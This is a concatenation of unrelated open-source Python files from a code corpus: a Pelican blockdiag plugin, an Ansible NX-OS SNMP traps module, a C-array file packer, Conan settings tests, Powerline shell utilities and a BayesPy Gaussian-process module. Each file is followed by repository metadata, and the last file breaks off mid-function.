DOT_BLOCK_RE = re.compile(r'^\s*(?P<diagram>\w+).*$', re.MULTILINE | re.DOTALL)
_draw_mode = 'PNG'
_publish_mode = 'PNG'
def get_diag(code, command):
""" Generate diagramm and return data """
import tempfile
import shutil
code = code + u'\n'
try:
tmpdir = tempfile.mkdtemp()
fd, diag_name = tempfile.mkstemp(dir=tmpdir)
f = os.fdopen(fd, "w")
f.write(code.encode('utf-8'))
f.close()
format = _draw_mode.lower()
draw_name = diag_name + '.' + format
saved_argv = sys.argv
argv = [diag_name, '-T', format, '-o', draw_name]
if _draw_mode == 'SVG':
argv += ['--ignore-pil']
# Run command
command.main(argv)
# Read image data from file
file_name = diag_name + '.' + _publish_mode.lower()
with io.open(file_name, 'rb') as f:
data = f.read()
f.close()
finally:
for file in os.listdir(tmpdir):
os.unlink(tmpdir + "/" + file)
# os.rmdir will fail -> use shutil
shutil.rmtree(tmpdir)
return data
def diag(code, command):
if command == "blockdiag": # blockdiag
import blockdiag.command
return get_diag(code, blockdiag.command)
elif command == "diagram": # diagram
import blockdiag.command
return get_diag(code, blockdiag.command)
elif command == "seqdiag": # seqdiag
import seqdiag.command
return get_diag(code, seqdiag.command)
elif command == "actdiag": # actdiag
import actdiag.command
return get_diag(code, actdiag.command)
elif command == "nwdiag": # nwdiag
import nwdiag.command
return get_diag(code, nwdiag.command)
elif command == "packetdiag": # packetdiag
import packetdiag.command
return get_diag(code, packetdiag.command)
elif command == "rackdiag": # racketdiag
import rackdiag.command
return get_diag(code, rackdiag.command)
else: # not found
print("No such command %s" % command)
return None
@LiquidTags.register("blockdiag")
def blockdiag_parser(preprocessor, tag, markup):
""" Blockdiag parser """
m = DOT_BLOCK_RE.search(markup)
if m:
# Get diagram type and code
diagram = m.group('diagram').strip()
code = markup
# Run command
output = diag(code, diagram)
if output:
# Return Base64 encoded image
return '<span class="blockdiag" style="align: center;"><img src="data:image/png;base64,%s"></span>' % base64.b64encode(output)
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# This import allows image tag to be a Pelican plugin
from .liquid_tags import register
| agpl-3.0 | -5,766,266,376,528,250,000 | 22.163842 | 138 | 0.532927 | false |
Yannig/ansible | lib/ansible/modules/network/nxos/nxos_snmp_traps.py | 8 | 7300 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_traps
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP traps.
description:
- Manages SNMP traps configurations.
author:
- Jason Edelman (@jedelman8)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- This module works at the group level for traps. If you need to only
enable/disable 1 specific trap within a group, use the M(nxos_command)
module.
- Be aware that you can set a trap only for an enabled feature.
options:
group:
description:
- Case sensitive group.
required: true
choices: ['aaa', 'bridge', 'callhome', 'cfs', 'config', 'entity',
'feature-control', 'hsrp', 'license', 'link', 'lldp', 'ospf', 'pim',
'rf', 'rmon', 'snmp', 'storm-control', 'stpx', 'sysmgr', 'system',
'upgrade', 'vtp', 'all']
state:
description:
- Manage the state of the resource.
required: false
default: enabled
choices: ['enabled','disabled']
'''
EXAMPLES = '''
# ensure lldp trap configured
- nxos_snmp_traps:
group: lldp
state: enabled
# ensure lldp trap is not configured
- nxos_snmp_traps:
group: lldp
state: disabled
'''
RETURN = '''
commands:
description: command sent to the device
returned: always
type: list
sample: "snmp-server enable traps lldp ;"
'''
from ansible.module_utils.nxos import load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
command = {
'command': command,
'output': 'json',
}
return run_commands(module, command)
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_snmp_traps(group, module):
body = execute_show_command('show snmp trap', module)
trap_key = {
'description': 'trap',
'isEnabled': 'enabled'
}
resource = {}
try:
resource_table = body[0]['TABLE_snmp_trap']['ROW_snmp_trap']
for each_feature in ['aaa', 'bridge', 'callhome', 'cfs', 'config',
'entity', 'feature-control', 'hsrp', 'license',
'link', 'lldp', 'ospf', 'pim', 'rf', 'rmon',
'snmp', 'storm-control', 'stpx', 'sysmgr',
'system', 'upgrade', 'vtp']:
resource[each_feature] = []
for each_resource in resource_table:
key = str(each_resource['trap_type'])
mapped_trap = apply_key_map(trap_key, each_resource)
if key != 'Generic':
resource[key].append(mapped_trap)
except (KeyError, AttributeError):
return resource
find = resource.get(group, None)
if group == 'all'.lower():
return resource
elif find:
trap_resource = {group: resource[group]}
return trap_resource
else:
# if 'find' is None, it means that 'group' is a
# currently disabled feature.
return {}
def get_trap_commands(group, state, existing, module):
commands = []
enabled = False
disabled = False
if group == 'all':
if state == 'disabled':
for feature in existing:
trap_commands = ['no snmp-server enable traps {0}'.format(feature) for
trap in existing[feature] if trap['enabled'] == 'Yes']
trap_commands = list(set(trap_commands))
commands.append(trap_commands)
elif state == 'enabled':
for feature in existing:
trap_commands = ['snmp-server enable traps {0}'.format(feature) for
trap in existing[feature] if trap['enabled'] == 'No']
trap_commands = list(set(trap_commands))
commands.append(trap_commands)
else:
if group in existing:
for each_trap in existing[group]:
check = each_trap['enabled']
if check.lower() == 'yes':
enabled = True
if check.lower() == 'no':
disabled = True
if state == 'disabled' and enabled:
commands.append(['no snmp-server enable traps {0}'.format(group)])
elif state == 'enabled' and disabled:
commands.append(['snmp-server enable traps {0}'.format(group)])
else:
module.fail_json(msg='{0} is not a currently '
'enabled feature.'.format(group))
return commands
def main():
argument_spec = dict(
state=dict(choices=['enabled', 'disabled'], default='enabled'),
group=dict(choices=['aaa', 'bridge', 'callhome', 'cfs', 'config',
'entity', 'feature-control', 'hsrp',
'license', 'link', 'lldp', 'ospf', 'pim', 'rf',
'rmon', 'snmp', 'storm-control', 'stpx',
'sysmgr', 'system', 'upgrade', 'vtp', 'all'],
required=True),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
results = {'changed': False, 'commands': [], 'warnings': warnings}
group = module.params['group'].lower()
state = module.params['state']
existing = get_snmp_traps(group, module)
commands = get_trap_commands(group, state, existing, module)
cmds = flatten_list(commands)
if cmds:
results['changed'] = True
if not module.check_mode:
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
results['commands'] = cmds
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,581,111,262,623,944,000 | 29.543933 | 87 | 0.571507 | false |
TakefiveInteractive/TedkOS | gui/cArrFile.py | 1 | 1145 | #!/usr/bin/python2.7
import sys
import struct
'''
magic ("\x01carray\x01file\x01")
numOfObjs (uint32_t)
For each obj:
length (uint32_t) (length = 0 <=> padding)
obj
0x55 0xaa
'''
magic = "\x01carray\x01file\x01"
# elements in List will be converted to bytearray.
def makeCArray(inputList):
ans = bytearray(magic)
objList = [bytearray(x) for x in inputList]
ans += struct.pack('<I', len(objList))
for obj in objList:
ans += struct.pack('<I', len(obj))
ans += obj
ans += bytearray(b'\x55')
ans += bytearray(b'\xAA')
return ans
if __name__ == "__main__":
if len(sys.argv) == 1:
print
print "Usage: " + sys.argv[0] + " [output] [front_padding] (input0) (input1) ..."
print " If any input = '-', it represents a padding"
print
sys.exit(-1)
outName = sys.argv[1]
front_padding = int(sys.argv[2])
inNames = sys.argv[3:]
inObjects = [bytearray()] * front_padding
for name in inNames:
if name == '-':
inObjects += [bytearray()]
else:
f = open(name, 'rb')
inObjects += [f.read()]
f.close()
ans = makeCArray(inObjects)
outFile = open(outName, 'wb+')
outFile.write(ans)
outFile.close() | gpl-2.0 | -5,790,802,003,291,314,000 | 19.836364 | 83 | 0.624454 | false |
luckielordie/conan | conans/test/remove_subsetting_test.py | 2 | 5370 | import unittest
from conans.test.utils.tools import TestClient
from conans.util.files import mkdir
import os
class RemoveSubsettingTest(unittest.TestCase):
def remove_options_test(self):
# https://github.com/conan-io/conan/issues/2327
# https://github.com/conan-io/conan/issues/2781
client = TestClient()
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
options = {"opt1": [True, False], "opt2": [True, False]}
default_options = "opt1=True", "opt2=False"
def config_options(self):
del self.options.opt2
def build(self):
assert "opt2" not in self.options
self.options.opt2
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run("install ..")
error = client.run("build ..", ignore_error=True)
self.assertTrue(error)
self.assertIn("ConanException: 'options.opt2' doesn't exist", client.out)
self.assertIn("Possible options are ['opt1']", client.out)
def remove_setting_test(self):
# https://github.com/conan-io/conan/issues/2327
client = TestClient()
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
settings = "os", "build_type"
def configure(self):
del self.settings.build_type
def source(self):
self.settings.build_type
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run("source ..") # Without install you can access build_type, no one has removed it
client.run("install ..")
# This raised an error because build_type wasn't defined
client.run("build ..")
error = client.run("source ..", ignore_error=True)
self.assertTrue(error)
self.assertIn("'settings.build_type' doesn't exist", client.user_io.out)
def remove_runtime_test(self):
# https://github.com/conan-io/conan/issues/2327
client = TestClient()
conanfile = """from conans import ConanFile, CMake
class Pkg(ConanFile):
settings = "os", "compiler", "arch"
def configure(self):
del self.settings.compiler.runtime
def build(self):
try:
self.settings.compiler.runtime
except Exception as e:
self.output.info(str(e))
cmake = CMake(self)
self.output.info(cmake.command_line)
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run('install .. -s os=Windows -s compiler="Visual Studio" -s compiler.version=15 -s arch=x86')
# This raised an error because build_type wasn't defined
client.run("build ..")
self.assertIn("'settings.compiler.runtime' doesn't exist for 'Visual Studio'", client.out)
self.assertNotIn("CONAN_LINK_RUNTIME", client.out)
self.assertIn('-DCONAN_COMPILER="Visual Studio"', client.out)
def remove_subsetting_test(self):
# https://github.com/conan-io/conan/issues/2049
client = TestClient()
base = '''from conans import ConanFile
class ConanLib(ConanFile):
name = "lib"
version = "0.1"
'''
test = """from conans import ConanFile, CMake
class ConanLib(ConanFile):
settings = "compiler", "arch"
def configure(self):
del self.settings.compiler.libcxx
def test(self):
pass
def build(self):
cmake = CMake(self)
self.output.info("TEST " + cmake.command_line)
"""
client.save({"conanfile.py": base,
"test_package/conanfile.py": test})
client.run("create . user/testing -s arch=x86_64 -s compiler=gcc "
"-s compiler.version=4.9 -s compiler.libcxx=libstdc++11")
self.assertNotIn("LIBCXX", client.out)
def remove_subsetting_build_test(self):
# https://github.com/conan-io/conan/issues/2049
client = TestClient()
conanfile = """from conans import ConanFile, CMake
class ConanLib(ConanFile):
settings = "compiler", "arch"
def package(self):
try:
self.settings.compiler.libcxx
except Exception as e:
self.output.error("PACKAGE " + str(e))
def configure(self):
del self.settings.compiler.libcxx
def build(self):
try:
self.settings.compiler.libcxx
except Exception as e:
self.output.error("BUILD " + str(e))
cmake = CMake(self)
self.output.info("BUILD " + cmake.command_line)
"""
client.save({"conanfile.py": conanfile})
client.run("install . -s arch=x86_64 -s compiler=gcc -s compiler.version=4.9 "
"-s compiler.libcxx=libstdc++11")
client.run("build .")
self.assertIn("ERROR: BUILD 'settings.compiler.libcxx' doesn't exist for 'gcc'",
client.out)
self.assertNotIn("LIBCXX", client.out)
client.run("package .")
self.assertIn("ERROR: PACKAGE 'settings.compiler.libcxx' doesn't exist for 'gcc'",
client.out)
| mit | 7,556,191,679,822,019,000 | 35.530612 | 109 | 0.618063 | false |
zeroc0d3/docker-lab | ruby/rootfs/usr/lib/python2.7/dist-packages/powerline/lib/shell.py | 16 | 4164 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from subprocess import Popen, PIPE
from functools import partial
from powerline.lib.encoding import get_preferred_input_encoding, get_preferred_output_encoding
if sys.platform.startswith('win32'):
# Prevent windows from launching consoles when calling commands
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms684863(v=vs.85).aspx
Popen = partial(Popen, creationflags=0x08000000)
def run_cmd(pl, cmd, stdin=None, strip=True):
'''Run command and return its stdout, stripped
If running command fails returns None and logs failure to ``pl`` argument.
:param PowerlineLogger pl:
Logger used to log failures.
:param list cmd:
Command which will be run.
:param str stdin:
String passed to command. May be None.
:param bool strip:
True if the result should be stripped.
'''
try:
p = Popen(cmd, shell=False, stdout=PIPE, stdin=PIPE)
except OSError as e:
pl.exception('Could not execute command ({0}): {1}', e, cmd)
return None
else:
stdout, err = p.communicate(
stdin if stdin is None else stdin.encode(get_preferred_output_encoding()))
stdout = stdout.decode(get_preferred_input_encoding())
return stdout.strip() if strip else stdout
def asrun(pl, ascript):
'''Run the given AppleScript and return the standard output and error.'''
return run_cmd(pl, ['osascript', '-'], ascript)
def readlines(cmd, cwd):
'''Run command and read its output, line by line
:param list cmd:
Command which will be run.
:param str cwd:
Working directory of the command which will be run.
'''
p = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE, cwd=cwd)
encoding = get_preferred_input_encoding()
p.stderr.close()
with p.stdout:
for line in p.stdout:
yield line[:-1].decode(encoding)
try:
from shutil import which
except ImportError:
# shutil.which was added in python-3.3. Here is what was added:
# Lib/shutil.py, commit 5abe28a9c8fe701ba19b1db5190863384e96c798
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
'''Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
``mode`` defaults to os.F_OK | os.X_OK. ``path`` defaults to the result
of ``os.environ.get('PATH')``, or can be overridden with a custom search
path.
'''
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (
os.path.exists(fn)
and os.access(fn, mode)
and not os.path.isdir(fn)
)
# If we’re given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get('PATH', os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == 'win32':
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get('PATHEXT', '').split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given 'python.exe'.
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don’t have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
| mit | 3,810,917,127,208,223,000 | 30.278195 | 94 | 0.703125 | false |
jluttine/bayespy | bayespy/inference/vmp/nodes/gp.py | 4 | 23431 | ################################################################################
# Copyright (C) 2011-2012 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
import itertools
import numpy as np
import scipy as sp
import scipy.linalg.decomp_cholesky as decomp
import scipy.linalg as linalg
import scipy.special as special
import matplotlib.pyplot as plt
import time
import profile
import scipy.spatial.distance as distance
from .node import Node
from .stochastic import Stochastic
from bayespy.utils.misc import *
# Computes log probability density function of the Gaussian
# distribution
def gaussian_logpdf(y_invcov_y,
y_invcov_mu,
mu_invcov_mu,
logdetcov,
D):
return (-0.5*D*np.log(2*np.pi)
-0.5*logdetcov
-0.5*y_invcov_y
+y_invcov_mu
-0.5*mu_invcov_mu)
# m prior mean function
# k prior covariance function
# x data inputs
# z processed data outputs (z = inv(Cov) * (y-m(x)))
# U data covariance Cholesky factor
def gp_posterior_moment_function(m, k, x, y, noise=None):
# Prior
mu = m(x)[0]
K = k(x,x)[0]
if noise != None:
K += noise
#print('hereiamagain')
#print(K)
# Compute posterior GP
N = len(y)
if N == 0:
U = None
z = None
else:
U = chol(K)
z = chol_solve(U, y-mu)
def get_moments(xh, covariance=1, mean=True):
(kh,) = k(x, xh)
# Function for computing posterior moments
if mean:
# Mean vector
mh = m(xh)
if z != None:
mh += np.dot(kh.T, z)
else:
mh = None
if covariance:
if covariance == 1:
# Variance vector
khh = k(xh)
if U != None:
khh -= np.einsum('i...,i...', kh, chol_solve(U, kh))
elif covariance == 2:
# Full covariance matrix
khh = k(xh,xh)
if U != None:
khh -= np.dot(kh.T, chol_solve(U,kh))
else:
khh = None
return [mh, khh]
return get_moments
# m prior mean function
# k prior covariance function
# x data inputs
# z processed data outputs (z = inv(Cov) * (y-m(x)))
# U data covariance Cholesky factor
## def gp_multi_posterior_moment_function(m, k, x, y, noise=None):
## # Prior
## mu = m(x)[0]
## K = k(x,x)[0]
## if noise != None:
## K += noise
## #print('hereiamagain')
## #print(K)
## # Compute posterior GP
## N = len(y)
## if N == 0:
## U = None
## z = None
## else:
## U = chol(K)
## z = chol_solve(U, y-mu)
## def get_moments(xh, covariance=1, mean=True):
## (kh,) = k(x, xh)
## # Function for computing posterior moments
## if mean:
## # Mean vector
## mh = m(xh)
## if z != None:
## mh += np.dot(kh.T, z)
## else:
## mh = None
## if covariance:
## if covariance == 1:
## # Variance vector
## khh = k(xh)
## if U != None:
## khh -= np.einsum('i...,i...', kh, chol_solve(U, kh))
## elif covariance == 2:
## # Full covariance matrix
## khh = k(xh,xh)
## if U != None:
## khh -= np.dot(kh.T, chol_solve(U,kh))
## else:
## khh = None
## return [mh, khh]
## return get_moments
def gp_cov_se(D2, overwrite=False):
if overwrite:
K = D2
K *= -0.5
np.exp(K, out=K)
else:
K = np.exp(-0.5*D2)
return K
def gp_cov_delta(N):
return np.identity(N)
def squared_distance(x1, x2):
# Reshape arrays to 2-D arrays
sh1 = np.shape(x1)[:-1]
sh2 = np.shape(x2)[:-1]
d = np.shape(x1)[-1]
x1 = np.reshape(x1, (-1,d))
x2 = np.reshape(x2, (-1,d))
# Compute squared Euclidean distance
D2 = distance.cdist(x1, x2, metric='sqeuclidean')
# Reshape the result
D2 = np.reshape(D2, sh1 + sh2)
return D2
# General rule for the parameters for covariance functions:
#
# (value, [ [dvalue1, ...], [dvalue2, ...], [dvalue3, ...], ...])
#
# For instance,
#
# k = covfunc_se((1.0, []), (15, [ [1,update_grad] ]))
# K = k((x1, [ [dx1,update_grad] ]), (x2, []))
#
# Plain values are converted as:
# value -> (value, [])
def gp_standardize_input(x):
if np.ndim(x) == 0:
x = add_trailing_axes(x, 2)
elif np.ndim(x) == 1:
x = add_trailing_axes(x, 1)
return x
def gp_preprocess_inputs(*args):
args = list(args)
if len(args) < 1 or len(args) > 2:
raise Exception("Number of inputs must be one or two")
if len(args) == 2:
if args[0] is args[1]:
args[0] = gp_standardize_input(args[0])
args[1] = args[0]
else:
args[1] = gp_standardize_input(args[1])
args[0] = gp_standardize_input(args[0])
else:
args[0] = gp_standardize_input(args[0])
return args
def covfunc_delta(theta, *inputs, gradient=False):
amplitude = theta[0]
if gradient:
gradient_amplitude = gradient[0]
else:
gradient_amplitude = []
inputs = gp_preprocess_inputs(*inputs)
# Compute distance and covariance matrix
if len(inputs) == 1:
# Only variance vector asked
x = inputs[0]
K = np.ones(np.shape(x)[:-1]) * amplitude**2
else:
# Full covariance matrix asked
x1 = inputs[0]
x2 = inputs[1]
# Number of inputs x1
N1 = np.shape(x1)[-2]
# x1 == x2?
if x1 is x2:
delta = True
# Delta covariance
K = gp_cov_delta(N1) * amplitude**2
else:
delta = False
# Number of inputs x2
N2 = np.shape(x2)[-2]
# Zero covariance
K = np.zeros((N1,N2))
# Gradient w.r.t. amplitude
if gradient:
for ind in range(len(gradient_amplitude)):
gradient_amplitude[ind] = K * (2 * gradient_amplitude[ind] / amplitude)
if gradient:
return (K, gradient)
else:
return K
def covfunc_se(theta, *inputs, gradient=False):
amplitude = theta[0]
lengthscale = theta[1]
## print('in se')
## print(amplitude)
## print(lengthscale)
if gradient:
gradient_amplitude = gradient[0]
gradient_lengthscale = gradient[1]
else:
gradient_amplitude = []
gradient_lengthscale = []
inputs = gp_preprocess_inputs(*inputs)
# Compute covariance matrix
if len(inputs) == 1:
x = inputs[0]
# Compute variance vector
K = np.ones(np.shape(x)[:-1])
K *= amplitude**2
# Compute gradient w.r.t. lengthscale
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] = np.zeros(np.shape(x)[:-1])
else:
x1 = inputs[0] / (lengthscale)
x2 = inputs[1] / (lengthscale)
# Compute distance matrix
K = squared_distance(x1, x2)
# Compute gradient partly
if gradient:
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] = K * ((lengthscale**-1) * gradient_lengthscale[ind])
# Compute covariance matrix
gp_cov_se(K, overwrite=True)
K *= amplitude**2
# Compute gradient w.r.t. lengthscale
if gradient:
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] *= K
# Gradient w.r.t. amplitude
if gradient:
for ind in range(len(gradient_amplitude)):
gradient_amplitude[ind] = K * (2 * gradient_amplitude[ind] / amplitude)
# Return values
if gradient:
return (K, gradient)
else:
return K
class NodeCovarianceFunction(Node):
def __init__(self, covfunc, *args, **kwargs):
self.covfunc = covfunc
params = list(args)
for i in range(len(args)):
# Check constant parameters
if is_numeric(args[i]):
params[i] = NodeConstant([np.asanyarray(args[i])],
dims=[np.shape(args[i])])
# TODO: Parameters could be constant functions? :)
Node.__init__(self, *params, dims=[(np.inf, np.inf)], **kwargs)
def message_to_child(self, gradient=False):
params = [parent.message_to_child(gradient=gradient) for parent in self.parents]
return self.covariance_function(*params)
def covariance_function(self, *params):
params = list(params)
gradient_params = list()
for ind in range(len(params)):
if isinstance(params[ind], tuple):
gradient_params.append(params[ind][1])
params[ind] = params[ind][0][0]
else:
gradient_params.append([])
params[ind] = params[ind][0]
def cov(*inputs, gradient=False):
if gradient:
grads = [[grad[0] for grad in gradient_params[ind]]
for ind in range(len(gradient_params))]
(K, dK) = self.covfunc(params,
*inputs,
gradient=grads)
for ind in range(len(dK)):
for (grad, dk) in zip(gradient_params[ind], dK[ind]):
grad[0] = dk
K = [K]
dK = []
for grad in gradient_params:
dK += grad
return (K, dK)
else:
K = self.covfunc(params,
*inputs,
gradient=False)
return [K]
return cov
class NodeCovarianceFunctionSum(NodeCovarianceFunction):
def __init__(self, *args, **kwargs):
NodeCovarianceFunction.__init__(self,
None,
*args,
**kwargs)
def covariance_function(self, *covfuncs):
def cov(*inputs, gradient=False):
K_sum = 0
if gradient:
dK_sum = list()
for k in covfuncs:
if gradient:
(K, dK) = k(*inputs, gradient=gradient)
dK_sum += dK
else:
K = k(*inputs, gradient=gradient)
K_sum += K[0]
if gradient:
return ([K_sum], dK_sum)
else:
return [K_sum]
return cov
class NodeCovarianceFunctionDelta(NodeCovarianceFunction):
def __init__(self, amplitude, **kwargs):
NodeCovarianceFunction.__init__(self,
covfunc_delta,
amplitude,
**kwargs)
class NodeCovarianceFunctionSquaredExponential(NodeCovarianceFunction):
def __init__(self, amplitude, lengthscale, **kwargs):
NodeCovarianceFunction.__init__(self,
covfunc_se,
amplitude,
lengthscale,
**kwargs)
class NodeMultiCovarianceFunction(NodeCovarianceFunction):
def __init__(self, *args, **kwargs):
NodeCovarianceFunction.__init__(self,
None,
*args,
**kwargs)
def covfunc(self, *covfuncs):
def cov(*inputs, gradient=False):
K_sum = 0
if gradient:
dK_sum = list()
for k in covfuncs:
if gradient:
(K, dK) = k(*inputs, gradient=gradient)
dK_sum += dK
else:
K = k(*inputs, gradient=gradient)
K_sum += K[0]
if gradient:
return ([K_sum], dK_sum)
else:
return [K_sum]
return cov
class NodeConstantGaussianProcess(Node):
def __init__(self, f, **kwargs):
self.f = f
Node.__init__(self, dims=[(np.inf,)], **kwargs)
def message_to_child(self, gradient=False):
# Wrapper
def func(x, gradient=False):
if gradient:
return ([self.f(x)], [])
else:
return [self.f(x)]
return func
# At least for now, simplify this GP node such that a GP is either
# observed or latent. If it is observed, it doesn't take messages from
# children, actually, it should not even have children!
#class NodeMultiGaussianProcess(NodeVariable):
class NodeMultiGaussianProcess(Stochastic):
def __init__(self, m, k, **kwargs):
self.x = []
self.f = []
# By default, posterior == prior
self.m = m
self.k = k
# Ignore plates
NodeVariable.__init__(self,
m,
k,
plates=(),
dims=[(np.inf,), (np.inf,np.inf)],
**kwargs)
def message_to_parent(self, index):
if index == 0:
k = self.parents[1].message_to_child()[0]
K = k(self.x, self.x)
return [self.x,
self.mu,
K]
if index == 1:
raise Exception("not implemented yet")
def message_to_child(self):
if self.observed:
raise Exception("Observable GP should not have children.")
return self.u
def get_parameters(self):
return self.u
def observe(self, x, f):
if np.ndim(x) == 1:
if np.shape(f) != np.shape(x):
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
elif np.shape(f) != np.shape(x)[:-1]:
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
self.observed = True
self.x = x
self.f = f
## self.x_obs = x
## self.f_obs = f
# You might want:
# - mean for x
# - covariance (and mean) for x
# - variance (and mean) for x
# - i.e., mean and/or (co)variance for x
# - covariance for x1 and x2
def lower_bound_contribution(self, gradient=False):
m = self.parents[0].message_to_child(gradient=gradient)
k = self.parents[1].message_to_child(gradient=gradient)
## m = self.parents[0].message_to_child(gradient=gradient)[0]
## k = self.parents[1].message_to_child(gradient=gradient)[0]
# Prior
if gradient:
(mu, dmus) = m(self.x, gradient=True)
(K, dKs) = k(self.x, self.x, gradient=True)
else:
mu = m(self.x)
K = k(self.x, self.x)
dmus = []
dKs = []
mu = mu[0]
K = K[0]
# Log pdf
if self.observed:
# Vector of f-mu
f0 = np.vstack([(f-m) for (f,m) in zip(self.f,mu)])
# Full covariance matrix
K_full = np.bmat(K)
try:
U = chol(K_full)
except linalg.LinAlgError:
print('non positive definite, return -inf')
return -np.inf
z = chol_solve(U, f0)
#print(K)
L = gaussian_logpdf(np.dot(f0, z),
0,
0,
logdet_chol(U),
np.size(self.f))
for (dmu, func) in dmus:
# Derivative w.r.t. mean vector
d = -np.sum(z)
# Send the derivative message
func += d
#func(d)
for (dK, func) in dKs:
# Compute derivative w.r.t. covariance matrix
d = 0.5 * (np.dot(z, np.dot(dK, z))
- np.trace(chol_solve(U, dK)))
# Send the derivative message
#print('add gradient')
#func += d
func(d)
else:
raise Exception('Not implemented yet')
return L
## Let f1 be observed and f2 latent function values.
# Compute <log p(f1,f2|m,k)>
#L = gaussian_logpdf(sum_product(np.outer(self.f,self.f) + self.Cov,
# Compute <log q(f2)>
def update(self):
# Messages from parents
m = self.parents[0].message_to_child()
k = self.parents[1].message_to_child()
## m = self.parents[0].message_to_child()[0]
## k = self.parents[1].message_to_child()[0]
if self.observed:
# Observations of this node
self.u = gp_posterior_moment_function(m, k, self.x, self.f)
else:
x = np.array([])
y = np.array([])
# Messages from children
for (child,index) in self.children:
(msg, mask) = child.message_to_parent(index)
# Ignoring masks and plates..
# m[0] is the inputs
x = np.concatenate((x, msg[0]), axis=-2)
# m[1] is the observations
y = np.concatenate((y, msg[1]))
# m[2] is the covariance matrix
V = linalg.block_diag(V, msg[2])
self.u = gp_posterior_moment_function(m, k, x, y, covariance=V)
self.x = x
self.f = y
class NodeGaussianProcess(Stochastic):
#class NodeGaussianProcess(NodeVariable):
def __init__(self, m, k, **kwargs):
self.x = np.array([])
self.f = np.array([])
## self.x_obs = np.zeros((0,1))
## self.f_obs = np.zeros((0,))
# By default, posterior == prior
self.m = m
self.k = k
# Ignore plates
NodeVariable.__init__(self,
m,
k,
plates=(),
dims=[(np.inf,), (np.inf,np.inf)],
**kwargs)
def message_to_parent(self, index):
if index == 0:
k = self.parents[1].message_to_child()[0]
K = k(self.x, self.x)
return [self.x,
self.mu,
K]
if index == 1:
raise Exception("not implemented yet")
def message_to_child(self):
if self.observed:
raise Exception("Observable GP should not have children.")
return self.u
def get_parameters(self):
return self.u
def observe(self, x, f):
if np.ndim(x) == 1:
if np.shape(f) != np.shape(x):
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
elif np.shape(f) != np.shape(x)[:-1]:
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
self.observed = True
self.x = x
self.f = f
## self.x_obs = x
## self.f_obs = f
# You might want:
# - mean for x
# - covariance (and mean) for x
# - variance (and mean) for x
# - i.e., mean and/or (co)variance for x
# - covariance for x1 and x2
def lower_bound_contribution(self, gradient=False):
m = self.parents[0].message_to_child(gradient=gradient)
k = self.parents[1].message_to_child(gradient=gradient)
## m = self.parents[0].message_to_child(gradient=gradient)[0]
## k = self.parents[1].message_to_child(gradient=gradient)[0]
# Prior
if gradient:
(mu, dmus) = m(self.x, gradient=True)
